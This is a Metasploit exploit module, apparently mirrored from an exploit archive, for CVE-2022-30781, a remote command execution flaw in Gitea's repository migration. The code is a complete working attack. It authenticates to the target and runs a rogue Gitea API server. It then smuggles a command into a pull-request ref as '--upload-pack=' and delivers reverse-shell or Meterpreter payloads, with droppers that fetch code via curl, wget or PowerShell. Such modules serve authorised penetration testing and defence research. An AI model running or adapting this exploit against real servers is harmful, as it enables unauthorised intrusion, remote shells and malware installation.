Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-MULTI-HTTP-GITEA_GIT_FETCH_RCE-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HTTP::Gitea
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Gitea Git Fetch Remote Code Execution',
        'Description' => %q{
          This module exploits Git fetch command in Gitea repository migration
          process that leads to a remote command execution on the system.
          This vulnerability affect Gitea before 1.16.7 version.
        },
        'Author' => [
          'wuhan005', # Original PoC
          'li4n0', # Original PoC
          'krastanoel' # MSF Module
        ],
        'References' => [
          ['CVE', '2022-30781'],
          ['URL', 'https://tttang.com/archive/1607/']
        ],
        'DisclosureDate' => '2022-05-16',
        'License' => MSF_LICENSE,
        'Platform' => %w[unix linux win],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => %i[curl wget echo printf],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
                'CMDSTAGER::URIPATH' => '/payloads'
              }
            }
          ]
        ],
        'DefaultOptions' => { 'WfsDelay' => 30 },
        'DefaultTarget' => 1,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )

    register_options([
      Opt::RPORT(3000),
      OptString.new('USERNAME', [true, 'Username to authenticate with']),
      OptString.new('PASSWORD', [true, 'Password to use']),
      OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),
    ])
  end

  def cleanup
    super
    return if @uid.nil? || @migrate_repo_created.nil?

    [@repo_name, @migrate_repo_name].each do |name|
      res = gitea_remove_repo(repo_path(name))
      if res.nil? || res&.code == 200
        vprint_warning("Unable to remove repository '#{name}'")
      elsif res&.code == 404
        vprint_warning("Repository '#{name}' not found, possibly already deleted")
      else
        vprint_status("Successfully cleanup repository '#{name}'")
      end
    end
  end

  def check
    return CheckCode::Safe('USERNAME can\'t be blank') if datastore['username'].blank?

    v = get_gitea_version
    gitea_login(datastore['username'], datastore['password'])

    if Rex::Version.new(v) <= Rex::Version.new('1.16.6')
      return CheckCode::Appears("Version detected: #{v}")
    end

    CheckCode::Safe("Version detected: #{v}")
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e
    return CheckCode::Unknown(e.message)
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError => e
    return CheckCode::Detected(e.message)
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError,
         Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e
    return CheckCode::Safe(e.message)
  end

  def primer
    [
      '/api/v1/version', '/api/v1/settings/api',
      "/api/v1/repos/#{@migrate_repo_path}",
      "/api/v1/repos/#{@migrate_repo_path}/pulls",
      "/api/v1/repos/#{@migrate_repo_path}/topics"
    ].each { |uri| hardcoded_uripath(uri) } # adding resources
  end

  def execute_command(cmd, _opts = {})
    if target['Type'] == :win_dropper
      # Git on Windows will pass the command to `sh.exe` and not `cmd`.
      # This requires some adjustments:
      # - Windows environment variables are mapped by `sh.exe`: `%VAR%` becomes `$VAR`
      # - `cmd` uses `&` to join multiple commands, whereas `sh.exe` uses `&&`.
      # - Backslashes need to be escaped with `sh.exe`
      cmd = cmd.gsub(/%(\w+)%/) { "$#{::Regexp.last_match(1)}" }.gsub(/&/) { '&&' }.gsub(/\\/) { '\\\\\\' }
    end
    vprint_status("Executing command: #{cmd}")

    @repo_name = rand_text_alphanumeric(6..15)
    @migrate_repo_name = rand_text_alphanumeric(6..15)
    @migrate_repo_path = repo_path(@migrate_repo_name)

    vprint_status("Creating repository \"#{@repo_name}\"")
    @uid = gitea_create_repo(@repo_name)
    vprint_good('Repository created')
    vprint_status('Migrating repository')
    clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}"
    auth_token = rand_text_alphanumeric(6..15)
    @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)
    @p = cmd
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError,
         Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError,
         Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e
    fail_with(Failure::UnexpectedReply, e.message)
  end

  def exploit
    unless datastore['AutoCheck']
      fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank?
      gitea_login(datastore['username'], datastore['password'])
    end

    start_service
    primer

    case target['Type']
    when :unix_cmd, :win_cmd
      execute_command(payload.encoded)
    when :linux_dropper, :win_dropper
      datastore['CMDSTAGER::URIPATH'] = "/#{rand_text_alphanumeric(6..15)}"
      execute_cmdstager(background: true, delay: 1)
    end
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e
    fail_with(Failure::UnexpectedReply, e.message)
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e
    fail_with(Failure::NoAccess, e.message)
  end

  def repo_path(name)
    "#{datastore['username']}/#{name}"
  end

  def on_request_uri(cli, req)
    case req.uri
    when '/api/v1/version'
      send_response(cli, '{"version": "1.16.6"}')
    when '/api/v1/settings/api'
      data = {
        max_response_items: 50, default_paging_num: 30,
        default_git_trees_per_page: 1000, default_max_blob_size: 10485760
      }
      send_response(cli, data.to_json)
    when "/api/v1/repos/#{@migrate_repo_path}"
      data = {
        clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}",
        owner: { login: datastore['username'] }
      }
      send_response(cli, data.to_json)
    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"
      send_response(cli, '{"topics":[]}')
    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"
      data = [
        {
          base: {
            ref: 'master'
          },
          head: {
            ref: "--upload-pack=#{@p}",
            repo: {
              clone_url: './',
              owner: { login: 'master' }
            }
          },
          updated_at: '2001-01-01T05:00:00+01:00',
          user: {}
        }
      ]
      send_response(cli, data.to_json)
    when datastore['CMDSTAGER::URIPATH']
      super
    end
  end
end